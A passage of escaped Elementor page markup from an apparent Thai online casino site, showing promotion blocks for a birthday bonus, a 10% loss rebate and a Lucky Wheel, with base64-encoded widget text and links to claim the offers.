Birthday Bonus <\\/h2>\\t\\t\\t\\t<\\/div>\\n\\t\\t[elementor-element k=\\\"98f3ea6f5123c692158e8167bedfd4ac\\\" data=\\\"eyJpZCI6IjZkN2FjZmEiLCJlbFR5cGUiOiJ3aWRnZXQiLCJzZXR0aW5ncyI6eyJlZGl0b3IiOiI8cCBzdHlsZT1cInRleHQtYWxpZ246IGNlbnRlcjtcIiBkYXRhLXN0YXJ0PVwiMTQxNVwiIGRhdGEtZW5kPVwiMTQ2NlwiPlx1ZDgzY1x1ZGY4MSBcdTBlMDlcdTBlMjVcdTBlMmRcdTBlMDdcdTBlNDBcdTBlMTRcdTBlMzdcdTBlMmRcdTBlMTlcdTBlNDBcdTBlMDFcdTBlMzRcdTBlMTQgXHUwZTIzXHUwZTMxXHUwZTFhXHUwZTAyXHUwZTJkXHUwZTA3XHUwZTAyXHUwZTI3XHUwZTMxXHUwZTBkXHUwZTE1XHUwZTMyXHUwZTIxXHUwZTIyXHUwZTJkXHUwZTE0XHUwZTFkXHUwZTMyXHUwZTAxXHUwZTJhXHUwZTMwXHUwZTJhXHUwZTIxXHUwZTIwXHUwZTMyXHUwZTIyXHUwZTQzXHUwZTE5XHUwZTQwXHUwZTE0XHUwZTM3XHUwZTJkXHUwZTE5XHUwZTE5XHUwZTMxXHUwZTQ5XHUwZTE5IDxiciBcLz4oXHUwZTIzXHUwZTMxXHUwZTFhXHUwZTQ0XHUwZTE0XHUwZTQ5XHUwZTE1XHUwZTI1XHUwZTJkXHUwZTE0XHUwZTE3XHUwZTMxXHUwZTQ5XHUwZTA3XHUwZTQwXHUwZTE0XHUwZTM3XHUwZTJkXHUwZTE5XHUwZTQwXHUwZTAxXHUwZTM0XHUwZTE0KTxcL3A+PHVsPjxsaSBkYXRhLXN0YXJ0PVwiMTQ2OVwiIGRhdGEtZW5kPVwiMTUxNVwiPlx1MGUyMlx1MGUyZFx1MGUxNFx1MGUxZFx1MGUzMlx1MGUwMVx1MGUyYVx1MGUzMFx1MGUyYVx1MGUyMSA8c3Ryb25nIGRhdGEtc3RhcnQ9XCIxNDgwXCIgZGF0YS1lbmQ9XCIxNDk2XCI+MywwMDAgXHUwZTAyXHUwZTM2XHUwZTQ5XHUwZTE5XHUwZTQ0XHUwZTFiPFwvc3Ryb25nPiBcdTIxOTIgPHN0cm9uZyBkYXRhLXN0YXJ0PVwiMTQ5OVwiIGRhdGEtZW5kPVwiMTUxM1wiPlx1MGUyM1x1MGUzMVx1MGUxYVx1MGUxZlx1MGUyM1x1MGUzNSAzMDA8XC9zdHJvbmc+PFwvbGk+PGxpIGRhdGEtc3RhcnQ9XCIxNDY5XCIgZGF0YS1lbmQ9XCIxNTE1XCI+XHUwZTIyXHUwZTJkXHUwZTE0XHUwZTFkXHUwZTMyXHUwZTAxXHUwZTJhXHUwZTMwXHUwZTJhXHUwZTIxIDxzdHJvbmcgZGF0YS1zdGFydD1cIjE1MjlcIiBkYXRhLWVuZD1cIjE1NDJcIj41MDBcdTIwMTMyLDk5OTxcL3N0cm9uZz4gXHUyMTkyIDxzdHJvbmcgZGF0YS1zdGFydD1cIjE1NDVcIiBkYXRhLWVuZD1cIjE1NTVcIj5cdTBlMjNcdTBlMzFcdTBlMWEgNTA8XC9zdHJvbmc+PFwvbGk+PGxpIGRhdGEtc3RhcnQ9XCIxNDY5XCIgZGF0YS1lbmQ9XCIxNTE1XCI+XHUwZTIyXHUwZTJkXHUwZTE0XHUwZTFkXHUwZTMyXHUwZTAxXHUwZTJhXHUwZTMwXHUwZTJhXHUwZTIxIDxzdHJvbmcgZGF0YS1zdGFydD1cIjE1NzFcIiBkYXRhLWVuZD1cIjE1ODZcIj5cdTBlNDRcdTBlMjFcdTBlNDhcdTBlNDBcdTBlMDFcdTBlMzRcdTBlMTkgNTAwPFwvc3Ryb25nPiBcdTIxOTIgPHN0cm9uZyBkYXRhLXN0YXJ0PVwiMTU4OVwiIGRhdGEtZW5kPVwiMTYxNlwiPlx1MGUxZFx1MGUzMlx1MGUwMVx1MGU0MFx1MGUxN1x1MGU0OFx1MGUzMlx1MGU0NFx1MGUyMyBcdTBlMjNcdTBlMzFcdTBlMWFcdTBlNDBcdTBlMWVcdTBlMzRcdTBlNDhcdTBlMjEgMTAwJTxcL3N0cm9uZz48XC9saT48XC91bD48cCBkYXRhLXN0YXJ0PVwiMjcxXCIgZGF0YS1lbmQ9XCIzODdcIj48c3BhbiBzdHlsZT1cInRleHQtZGVjb3JhdGlvbjogdW5kZXJsaW5lO1wiPjxzdHJvbmcgZGF0YS1zdGFydD1cIjM3MVwiIGRhdGEtZW5kPVwiMzg3XCI+XHUwZTJhXHUwZTIzXHUwZTM4XHUwZTFiXHUwZTQwXHUwZTA3XHUwZTM3XHUwZTQ4XHUwZTJkXHUwZTE5XHUwZTQ0XHUwZTAyPFwvc3Ryb25nPjxcL3NwYW4+PFwvcD48dWw+PGxpIGRhdGEtc3RhcnQ9XCIxNjM0XCIgZGF0YS1lbmQ9XCIxNjgwXCI+PHN0cm9uZyBkYXRhLXN0YXJ0PVwiMTYzNFwiIGRhdGEtZW5kPVwiMTY1M1wiPlx1MGUxN1x1MGUzM1x1MGU0MFx1MGUxN1x1MGUzNFx1MGUyM1x1MGU0Y1x1MGUxOSA1IFx1MGU0MFx1MGUxN1x1MGU0OFx1MGUzMjxcL3N0cm9uZz4sIDxzdHJvbmcgZGF0YS1zdGFydD1cIjE2NTVcIiBkYXRhLWVuZD1cIjE2NzhcIj5cdTBlMTZcdTBlMmRcdTBlMTlcdTBlNDRcdTBlMTRcdTBlNDlcdTBlMmFcdTBlMzlcdTBlMDdcdTBlMmFcdTBlMzhcdTBlMTQgMyBcdTBlNDBcdTBlMTdcdTBlNDhcdTBlMzI8XC9zdHJvbmc+PFwvbGk+PGxpIGRhdGEtc3RhcnQ9XCIxNjM0XCIgZGF0YS1lbmQ9XCIxNjgwXCI+XHUwZTIyXHUwZTM3XHUwZTE5XHUwZTIyXHUwZTMxXHUwZTE5XHUwZTJhXHUwZTM0XHUwZTE3XHUwZTE4XHUwZTM0XHUwZTRjXHUwZTQyXHUwZTE0XHUwZTIyIDxzdHJvbmcgZGF0YS1zdGFydD1cIjE2OTlcIiBkYXRhLWVuZD1cIjE3MjdcIj5cdTBlNDFcdTBlMDhcdTBlNDlcdTBlMDdcdTBlMWFcdTBlMzFcdTBlMTVcdTBlMjNcdTBlMWJcdTBlMjNcdTBlMzBcdTBlMGFcdTBlMzJcdTBlMGFcdTBlMTlcdTBlMDFcdTBlMzFcdTBlMWFcdTBlNDFcdTBlMmRcdTBlMTRcdTBlMjFcdTBlMzRcdTBlMTk8XC9zdHJvbmc+PFwvbGk+PFwvdWw+In0sImVsZW1lbnRzIjpbXSwid2lkZ2V0VHlwZSI6InRleHQtZWRpdG9yIn0=\\\"]\\t\\t<div class=\\\"elementor-element elementor-element-e97b605 elementor-align-center elementor-widget elementor-widget-button\\\" data-id=\\\"e97b605\\\" data-element_type=\\\"widget\\\" data-e-type=\\\"widget\\\" data-widget_type=\\\"button.default\\\">\\n\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t<a class=\\\"elementor-button elementor-button-link elementor-size-sm\\\" href=\\\"http:\\/\\/luca333line.com\\\" target=\\\"_blank\\\">\\n\\t\\t\\t\\t\\t\\t<span class=\\\"elementor-button-content-wrapper\\\">\\n\\t\\t\\t\\t\\t\\t<span class=\\\"elementor-button-icon\\\">\\n\\t\\t\\t\\t<svg aria-hidden=\\\"true\\\" class=\\\"e-font-icon-svg e-fas-gift\\\" viewBox=\\\"0 0 512 512\\\" xmlns=\\\"http:\\/\\/www.w3.org\\/2000\\/svg\\\"><path d=\\\"M32 448c0 17.7 14.3 32 32 32h160V320H32v128zm256 32h160c17.7 0 32-14.3 32-32V320H288v160zm192-320h-42.1c6.2-12.1 10.1-25.5 10.1-40 0-48.5-39.5-88-88-88-41.6 0-68.5 21.3-103 68.3-34.5-47-61.4-68.3-103-68.3-48.5 0-88 39.5-88 88 0 14.5 3.8 27.9 10.1 40H32c-17.7 0-32 14.3-32 32v80c0 8.8 7.2 16 16 16h480c8.8 0 16-7.2 16-16v-80c0-17.7-14.3-32-32-32zm-326.1 0c-22.1 0-40-17.9-40-40s17.9-40 40-40c19.9 0 34.6 3.3 86.1 80h-86.1zm206.1 0h-86.1c51.4-76.5 65.7-80 86.1-80 22.1 0 40 17.9 40 40s-17.9 40-40 40z\\\"><\\/path><\\/svg>\\t\\t\\t<\\/span>\\n\\t\\t\\t\\t\\t\\t\\t\\t\\t<span class=\\\"elementor-button-text\\\">\\u0e23\\u0e31\\u0e1a\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19 \\u0e04\\u0e25\\u0e34\\u0e01\\u0e40\\u0e25\\u0e22<\\/span>\\n\\t\\t\\t\\t\\t<\\/span>\\n\\t\\t\\t\\t\\t<\\/a>\\n\\t\\t\\t\\t\\t\\t\\t\\t<\\/div>\\n\\t\\t\\t\\t\\t<\\/div>\\n\\t\\t<\\/div>\\n\\t\\t\\t\\t\\t<\\/div>\\n\\t\\t<\\/section>\\n\\t\\t\\t\\t<section class=\\\"elementor-section elementor-top-section elementor-element elementor-element-9947189 elementor-section-boxed elementor-section-height-default elementor-section-height-default\\\" data-id=\\\"9947189\\\" data-element_type=\\\"section\\\" data-e-type=\\\"section\\\">\\n\\t\\t\\t\\t\\t\\t<div class=\\\"elementor-container elementor-column-gap-default\\\">\\n\\t\\t\\t\\t\\t<div class=\\\"elementor-column elementor-col-50 elementor-top-column elementor-element elementor-element-b558a2e\\\" data-id=\\\"b558a2e\\\" data-element_type=\\\"column\\\" data-e-type=\\\"column\\\" data-settings=\\\"{"background_background":"classic"}\\\">\\n\\t\\t\\t<div class=\\\"elementor-widget-wrap elementor-element-populated\\\">\\n\\t\\t\\t\\t\\t\\t<div class=\\\"elementor-element elementor-element-0d72c4a elementor-widget elementor-widget-image\\\" data-id=\\\"0d72c4a\\\" data-element_type=\\\"widget\\\" data-e-type=\\\"widget\\\" data-widget_type=\\\"image.default\\\">\\n\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t<img width=\\\"1200\\\" height=\\\"500\\\" src=\\\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/Reward-10_-Banner-AMB18.webp\\\" class=\\\"attachment-full size-full wp-image-362\\\" alt=\\\"\\\" srcset=\\\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/Reward-10_-Banner-AMB18.webp 1200w, https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/Reward-10_-Banner-AMB18-300x125.webp 300w, https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/Reward-10_-Banner-AMB18-1024x427.webp 1024w, https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/Reward-10_-Banner-AMB18-768x320.webp 768w\\\" sizes=\\\"(max-width: 1200px) 100vw, 1200px\\\" \\/>\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t<\\/div>\\n\\t\\t\\t\\t<div class=\\\"elementor-element elementor-element-54c71af elementor-widget elementor-widget-heading\\\" data-id=\\\"54c71af\\\" data-element_type=\\\"widget\\\" data-e-type=\\\"widget\\\" data-widget_type=\\\"heading.default\\\">\\n\\t\\t\\t\\t\\t<h2 class=\\\"elementor-heading-title elementor-size-default\\\">\\u0e04\\u0e37\\u0e19\\u0e22\\u0e2d\\u0e14\\u0e40\\u0e2a\\u0e35\\u0e22 10%<\\/h2>\\t\\t\\t\\t<\\/div>\\n\\t\\t[elementor-element k=\\\"98f3ea6f5123c692158e8167bedfd4ac\\\" data=\\\"eyJpZCI6IjIzNGQ3YjgiLCJlbFR5cGUiOiJ3aWRnZXQiLCJzZXR0aW5ncyI6eyJlZGl0b3IiOiI8cCBzdHlsZT1cInRleHQtYWxpZ246IGNlbnRlcjtcIiBkYXRhLXN0YXJ0PVwiMTA4OFwiIGRhdGEtZW5kPVwiMTExOFwiPlx1MGU0MFx1MGUyYVx1MGUzNVx1MGUyMlx1MGU0NFx1MGUyMVx1MGU0OFx1MGU0MFx1MGUyYVx1MGUzNVx1MGUyMlx1MGU0MFx1MGUxYlx1MGUyNVx1MGU0OFx1MGUzMiEgXHUwZTIzXHUwZTMwXHUwZTFhXHUwZTFhIDxzdHJvbmcgZGF0YS1zdGFydD1cIjE4NDRcIiBkYXRhLWVuZD1cIjE4NzhcIj5cdTBlNDFcdTBlMWJcdTBlMjVcdTBlMDdcdTBlMjJcdTBlMmRcdTBlMTRcdTBlNDBcdTBlMmFcdTBlMzVcdTBlMjJcdTBlNDBcdTBlMWJcdTBlNDdcdTBlMTlcdTBlNDFcdTBlMTVcdTBlNDlcdTBlMjEgUmV3YXJkIDEwJTxcL3N0cm9uZz4gPGJyIFwvPlx1MGUxOVx1MGUzM1x1MGU0MVx1MGUxNVx1MGU0OVx1MGUyMVx1MGU0NFx1MGUxYlx1MGUyNVx1MGUzOFx1MGU0OVx1MGUxOVx1MGU0M1x1MGUyYlx1MGUyMVx1MGUyYlx1MGUyM1x1MGUzN1x1MGUyZFx1MGUwOFx1MGUzMFx1MGU0MVx1MGUyNVx1MGUwMVx1MGUwMlx1MGUyZFx1MGUwN1x1MGUyM1x1MGUzMlx1MGUwN1x1MGUyN1x1MGUzMVx1MGUyNVx1MGUwMVx1MGU0N1x1MGU0NFx1MGUxNFx1MGU0OSBcdTBlNDNcdTBlMTlcdTBlMmJcdTBlMTlcdTBlNDlcdTBlMzJcdTBlNDFcdTBlMjVcdTBlMDFcdTBlNDFcdTBlMTVcdTBlNDlcdTBlMjE8XC9wPjxwPjxzcGFuIHN0eWxlPVwidGV4dC1kZWNvcmF0aW9uOiB1bmRlcmxpbmU7XCI+PHN0cm9uZz5cdTBlMmFcdTBlMjNcdTBlMzhcdTBlMWJcdTBlNDBcdTBlMDdcdTBlMzdcdTBlNDhcdTBlMmRcdTBlMTlcdTBlNDRcdTBlMDI8XC9zdHJvbmc+PFwvc3Bhbj48XC9wPjx1bD48bGkgZGF0YS1zdGFydD1cIjE5MzZcIiBkYXRhLWVuZD1cIjE5OTBcIj5cdTBlMDRcdTBlMzRcdTBlMTRcdTBlNDBcdTBlMWJcdTBlNDdcdTBlMTlcdTBlNDBcdTBlMWJcdTBlMmRcdTBlMjNcdTBlNGNcdTBlNDBcdTBlMGJcdTBlNDdcdTBlMTlcdTBlMTVcdTBlNGNcdTBlMDhcdTBlMzJcdTBlMDFcdTBlMjJcdTBlMmRcdTBlMTRcdTBlNDBcdTBlMmFcdTBlMzVcdTBlMjJcdTBlMmFcdTBlMzhcdTBlMTdcdTBlMThcdTBlMzQgXHUwZTE1XHUwZTMyXHUwZTIxXHUwZTIzXHUwZTJkXHUwZTFhXHUwZTE3XHUwZTM1XHUwZTQ4XHUwZTIzXHUwZTMwXHUwZTFhXHUwZTFhXHUwZTAxXHUwZTMzXHUwZTJiXHUwZTE5XHUwZTE0PFwvbGk+PGxpIGRhdGEtc3RhcnQ9XCIxOTM2XCIgZGF0YS1lbmQ9XCIxOTkwXCI+XHUwZTQxXHUwZTE1XHUwZTQ5XHUwZTIxXHUwZTQ0XHUwZTIxXHUwZTQ4XHUwZTQzXHUwZTBhXHUwZTQ4XHUwZTQwXHUwZTA3XHUwZTM0XHUwZTE5XHUwZTJhXHUwZTE0XHUwZTQyXHUwZTE0XHUwZTIyXHUwZTE1XHUwZTIzXHUwZTA3IFx1MGUxNVx1MGU0OVx1MGUyZFx1MGUwN1x1MGUxOVx1MGUzM1x1MGU0NFx1MGUxYlx1MGU0MVx1MGUyNVx1MGUwMVx1MGUxNVx1MGUzMlx1MGUyMVx1MGUyM1x1MGUzMlx1MGUyMlx1MGUwMVx1MGUzMlx1MGUyM1x1MGUxN1x1MGUzNVx1MGU0OFx1MGU0MFx1MGUxYlx1MGUzNFx1MGUxNFx1MGU0M1x1MGUyYlx1MGU0OVx1MGU0MVx1MGUyNVx1MGUwMVx1MGU0M1x1MGUxOVx1MGUwMlx1MGUxM1x1MGUzMFx1MGUxOVx1MGUzMVx1MGU0OVx1MGUxOTxcL2xpPjxcL3VsPiJ9LCJlbGVtZW50cyI6W10sIndpZGdldFR5cGUiOiJ0ZXh0LWVkaXRvciJ9\\\"]\\t\\t<div class=\\\"elementor-element elementor-element-5ce39e5 elementor-align-center elementor-widget elementor-widget-button\\\" data-id=\\\"5ce39e5\\\" data-element_type=\\\"widget\\\" data-e-type=\\\"widget\\\" data-widget_type=\\\"button.default\\\">\\n\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t<a class=\\\"elementor-button elementor-button-link elementor-size-sm\\\" href=\\\"http:\\/\\/luca333line.com\\\" target=\\\"_blank\\\">\\n\\t\\t\\t\\t\\t\\t<span class=\\\"elementor-button-content-wrapper\\\">\\n\\t\\t\\t\\t\\t\\t<span class=\\\"elementor-button-icon\\\">\\n\\t\\t\\t\\t<svg aria-hidden=\\\"true\\\" class=\\\"e-font-icon-svg e-fas-gift\\\" viewBox=\\\"0 0 512 512\\\" xmlns=\\\"http:\\/\\/www.w3.org\\/2000\\/svg\\\"><path d=\\\"M32 448c0 17.7 14.3 32 32 32h160V320H32v128zm256 32h160c17.7 0 32-14.3 32-32V320H288v160zm192-320h-42.1c6.2-12.1 10.1-25.5 10.1-40 0-48.5-39.5-88-88-88-41.6 0-68.5 21.3-103 68.3-34.5-47-61.4-68.3-103-68.3-48.5 0-88 39.5-88 88 0 14.5 3.8 27.9 10.1 40H32c-17.7 0-32 14.3-32 32v80c0 8.8 7.2 16 16 16h480c8.8 0 16-7.2 16-16v-80c0-17.7-14.3-32-32-32zm-326.1 0c-22.1 0-40-17.9-40-40s17.9-40 40-40c19.9 0 34.6 3.3 86.1 80h-86.1zm206.1 0h-86.1c51.4-76.5 65.7-80 86.1-80 22.1 0 40 17.9 40 40s-17.9 40-40 40z\\\"><\\/path><\\/svg>\\t\\t\\t<\\/span>\\n\\t\\t\\t\\t\\t\\t\\t\\t\\t<span class=\\\"elementor-button-text\\\">\\u0e23\\u0e31\\u0e1a\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19 \\u0e04\\u0e25\\u0e34\\u0e01\\u0e40\\u0e25\\u0e22<\\/span>\\n\\t\\t\\t\\t\\t<\\/span>\\n\\t\\t\\t\\t\\t<\\/a>\\n\\t\\t\\t\\t\\t\\t\\t\\t<\\/div>\\n\\t\\t\\t\\t\\t<\\/div>\\n\\t\\t<\\/div>\\n\\t\\t\\t\\t<div class=\\\"elementor-column elementor-col-50 elementor-top-column elementor-element elementor-element-21cd1ab\\\" data-id=\\\"21cd1ab\\\" data-element_type=\\\"column\\\" data-e-type=\\\"column\\\" data-settings=\\\"{"background_background":"classic"}\\\">\\n\\t\\t\\t<div class=\\\"elementor-widget-wrap elementor-element-populated\\\">\\n\\t\\t\\t\\t\\t\\t<div class=\\\"elementor-element elementor-element-879b024 elementor-widget elementor-widget-image\\\" data-id=\\\"879b024\\\" data-element_type=\\\"widget\\\" data-e-type=\\\"widget\\\" data-widget_type=\\\"image.default\\\">\\n\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t<img width=\\\"1200\\\" height=\\\"500\\\" src=\\\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/Lucky-wheel-Banner-AMB18.webp\\\" class=\\\"attachment-full size-full wp-image-358\\\" alt=\\\"\\\" srcset=\\\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/Lucky-wheel-Banner-AMB18.webp 1200w, https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/Lucky-wheel-Banner-AMB18-300x125.webp 300w, https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/Lucky-wheel-Banner-AMB18-1024x427.webp 1024w, https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/Lucky-wheel-Banner-AMB18-768x320.webp 768w\\\" sizes=\\\"(max-width: 1200px) 100vw, 1200px\\\" \\/>\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t<\\/div>\\n\\t\\t\\t\\t<div class=\\\"elementor-element elementor-element-6b5fc02 elementor-widget elementor-widget-heading\\\" data-id=\\\"6b5fc02\\\" data-element_type=\\\"widget\\\" data-e-type=\\\"widget\\\" data-widget_type=\\\"heading.default\\\">\\n\\t\\t\\t\\t\\t<h2 class=\\\"elementor-heading-title elementor-size-default\\\">Lucky Wheel \\u0e01\\u0e07\\u0e25\\u0e49\\u0e2d\\u0e40\\u0e2a\\u0e35\\u0e48\\u0e22\\u0e07\\u0e42\\u0e0a\\u0e04 <\\/h2>\\t\\t\\t\\t<\\/div>\\n\\t\\t[elementor-element k=\\\"98f3ea6f5123c692158e8167bedfd4ac\\\" data=\\\"eyJpZCI6ImEzMjhjZGQiLCJlbFR5cGUiOiJ3aWRnZXQiLCJzZXR0aW5ncyI6eyJlZGl0b3IiOiI8cCBzdHlsZT1cInRleHQtYWxpZ246IGNlbnRlcjtcIiBkYXRhLXN0YXJ0PVwiMTQxNVwiIGRhdGEtZW5kPVwiMTQ2NlwiPlx1MGUyYlx1MGUyMVx1MGUzOFx1MGUxOVx1MGUyNVx1MGUzOFx1MGU0OVx1MGUxOVx1MGUyM1x1MGUzMlx1MGUwN1x1MGUyN1x1MGUzMVx1MGUyNVx1MGUxN1x1MGUzOFx1MGUwMVx1MGUyN1x1MGUzMVx1MGUxOVx1MGUxNFx1MGU0OVx1MGUyN1x1MGUyMlx1MGU0MVx1MGUxNVx1MGU0OVx1MGUyMSA8c3Ryb25nIGRhdGEtc3RhcnQ9XCI3NVwiIGRhdGEtZW5kPVwiODVcIj5SZXdhcmQ8XC9zdHJvbmc+IFx1MGUwMlx1MGUyZFx1MGUwN1x1MGUwNFx1MGUzOFx1MGUxMyA8YnIgXC8+XHUwZTQwXHUwZTFiXHUwZTI1XHUwZTM1XHUwZTQ4XHUwZTIyXHUwZTE5XHUwZTQxXHUwZTE1XHUwZTQ5XHUwZTIxXHUwZTQwXHUwZTFiXHUwZTQ3XHUwZTE5XHUwZTJhXHUwZTM0XHUwZTE3XHUwZTE4XHUwZTM0XHUwZTRjXHUwZTJiXHUwZTIxXHUwZTM4XHUwZTE5IFx1MGU0MVx1MGUyNVx1MGU0OVx1MGUyN1x1MGUyM1x1MGUzMVx1MGUxYVx1MGU0MFx1MGUwNFx1MGUyM1x1MGUxNFx1MGUzNFx1MGUxNVx1MGU0Mlx1MGUxYVx1MGUxOVx1MGUzMVx1MGUyYVx1MGUxN1x1MGUzMVx1MGUxOVx1MGUxN1x1MGUzNVx1MGUyYlx1MGUyNVx1MGUzMVx1MGUwN1x1MGUwOFx1MGUxYVx1MGUwMVx1MGUzMlx1MGUyM1x1MGUyYlx1MGUyMVx1MGUzOFx1MGUxOTxcL3A+PHAgZGF0YS1zdGFydD1cIjI3MVwiIGRhdGEtZW5kPVwiMzg3XCI+PHNwYW4gc3R5bGU9XCJ0ZXh0LWRlY29yYXRpb246IHVuZGVybGluZTtcIj48c3Ryb25nIGRhdGEtc3RhcnQ9XCIzNzFcIiBkYXRhLWVuZD1cIjM4N1wiPlx1MGUyYVx1MGUyM1x1MGUzOFx1MGUxYlx1MGU0MFx1MGUwN1x1MGUzN1x1MGU0OFx1MGUyZFx1MGUxOVx1MGU0NFx1MGUwMjxcL3N0cm9uZz48XC9zcGFuPjxcL3A+PHVsPjxsaSBkYXRhLXN0YXJ0PVwiMTk3XCIgZGF0YS1lbmQ9XCIyNTJcIj48c3Ryb25nIGRhdGEtc3RhcnQ9XCIxOTdcIiBkYXRhLWVuZD1cIjI1MFwiPjIwIFwvIDUwIFwvIDEwMCBcLyAxNTAgXC8gMjAwIFwvIDI1MCBcLyAzMDAgXHUwZTQwXHUwZTA0XHUwZTIzXHUwZTE0XHUwZTM0XHUwZTE1XHUwZTQyXHUwZTFhXHUwZTE5XHUwZTMxXHUwZTJhPFwvc3Ryb25nPjxcL2xpPjxsaSBkYXRhLXN0YXJ0PVwiMTk3XCIgZGF0YS1lbmQ9XCIyNTJcIj48c3Ryb25nIGRhdGEtc3RhcnQ9XCIyNTVcIiBkYXRhLWVuZD1cIjI3NVwiPlx1ZDgzY1x1ZGY4MSBNeXN0ZXJ5IFByaXplPFwvc3Ryb25nPlx1MDBhMFx1MGUyYVx1MGUzOFx1MGU0OFx1MGUyMVx1MGUyM1x1MGUzMlx1MGUwN1x1MGUyN1x1MGUzMVx1MGUyNVx1MGUxZVx1MGUzNFx1MGU0MFx1MGUyOFx1MGUyOSAoXHUwZTQwXHUwZTBhXHUwZTQ4XHUwZTE5IDUwMCBcdTBlNDBcdTBlMDRcdTBlMjNcdTBlMTRcdTBlMzRcdTBlMTUgPHN0cm9uZyBkYXRhLXN0YXJ0PVwiMzEwXCIgZGF0YS1lbmQ9XCIzMThcIj5cdTBlMmJcdTBlMjNcdTBlMzdcdTBlMmQ8XC9zdHJvbmc+IFx1MGUyYVx1MGUxYlx1MGUzNFx1MGUxOVx1MGU0MFx1MGUxZVx1MGUzNFx1MGU0OFx1MGUyMSArMSk8XC9saT48XC91bD4ifSwiZWxlbWVudHMiOltdLCJ3aWRnZXRUeXBlIjoidGV4dC1lZGl0b3IifQ==\\\"]\\t\\t<div class=\\\"elementor-element elementor-element-5aae432 elementor-align-center elementor-widget elementor-widget-button\\\" data-id=\\\"5aae432\\\" data-element_type=\\\"widget\\\" data-e-type=\\\"widget\\\" data-widget_type=\\\"button.default\\\">\\n\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t<a class=\\\"elementor-button elementor-button-link elementor-size-sm\\\" href=\\\"http:\\/\\/luca333line.com\\\" target=\\\"_blank\\\">\\n\\t\\t\\t\\t\\t\\t<span class=\\\"elementor-button-content-wrapper\\\">\\n\\t\\t\\t\\t\\t\\t<span class=\\\"elementor-button-icon\\\">\\n\\t\\t\\t\\t<svg aria-hidden=\\\"true\\\" class=\\\"e-font-icon-svg e-fas-gift\\\" viewBox=\\\"0 0 512 512\\\" xmlns=\\\"http:\\/\\/www.w3.org\\/2000\\/svg\\\"><path d=\\\"M32 448c0 17.7 14.3 32 32 32h160V320H32v128zm256 32h160c17.7 0 32-14.3 32-32V320H288v160zm192-320h-42.1c6.2-12.1 10.1-25.5 10.1-40 0-48.5-39.5-88-88-88-41.6 0-68.5 21.3-103 68.3-34.5-47-61.4-68.3-103-68.3-48.5 0-88 39.5-88 88 0 14.5 3.8 27.9 10.1 40H32c-17.7 0-32 14.3-32 32v80c0 8.8 7.2 16 16 16h480c8.8 0 16-7.2 16-16v-80c0-17.7-14.3-32-32-32zm-326.1 0c-22.1 0-40-17.9-40-40s17.9-40 40-40c19.9 0 34.6 3.3 86.1 80h-86.1zm206.1 0h-86.1c51.4-76.5 65.7-80 86.1-80 22.1 0 40 17.9 40 40s-17.9 40-40 40z\\\"><\\/path><\\/svg>\\t\\t\\t<\\/span>\\n\\t\\t\\t\\t\\t\\t\\t\\t\\t<span class=\\\"elementor-button-text\\\">\\u0e23\\u0e31\\u0e1a\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19 \\u0e04\\u0e25\\u0e34\\u0e01\\u0e40\\u0e25\\u0e22<\\/span>\\n\\t\\t\\t\\t\\t<\\/span>\\n\\t\\t\\t\\t\\t<\\/a>\\n\\t\\t\\t\\t\\t\\t\\t\\t<\\/div>\\n\\t\\t\\t\\t\\t<\\/div>\\n\\t\\t<\\/div>\\n\\t\\t\\t\\t\\t<\\/div>\\n\\t\\t<\\/section>\\n\\t\\t\\t\\t<section class=\\\"elementor-section elementor-top-section elementor-element elementor-element-d6f8124 elementor-section-boxed elementor-section-height-default elementor-section-height-default\\\" data-id=\\\"d6f8124\\\" data-element_type=\\\"section\\\" data-e-type=\\\"section\\\">\\n\\t\\t\\t\\t\\t\\t<div class=\\\"elementor-container elementor-column-gap-default\\\">\\n\\t\\t\\t\\t\\t<div class=\\\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-4ce4610\\\" data-id=\\\"4ce4610\\\" data-element_type=\\\"column\\\" data-e-type=\\\"column\\\">\\n\\t\\t\\t<div class=\\\"elementor-widget-wrap elementor-element-populated\\\">\\n\\t\\t\\t\\t\\t\\t<div class=\\\"elementor-element elementor-element-9e70ab2 elementor-widget elementor-widget-heading\\\" data-id=\\\"9e70ab2\\\" data-element_type=\\\"widget\\\" data-e-type=\\\"widget\\\" data-widget_type=\\\"heading.default\\\">\\n\\t\\t\\t\\t\\t<h2 class=\\\"elementor-heading-title elementor-size-default\\\">\\u0e27\\u0e34\\u0e18\\u0e35\\u0e01\\u0e32\\u0e23\\u0e23\\u0e31\\u0e1a\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19<\\/h2>\\t\\t\\t\\t<\\/div>\\n\\t\\t[elementor-element k=\\\"98f3ea6f5123c692158e8167bedfd4ac\\\" 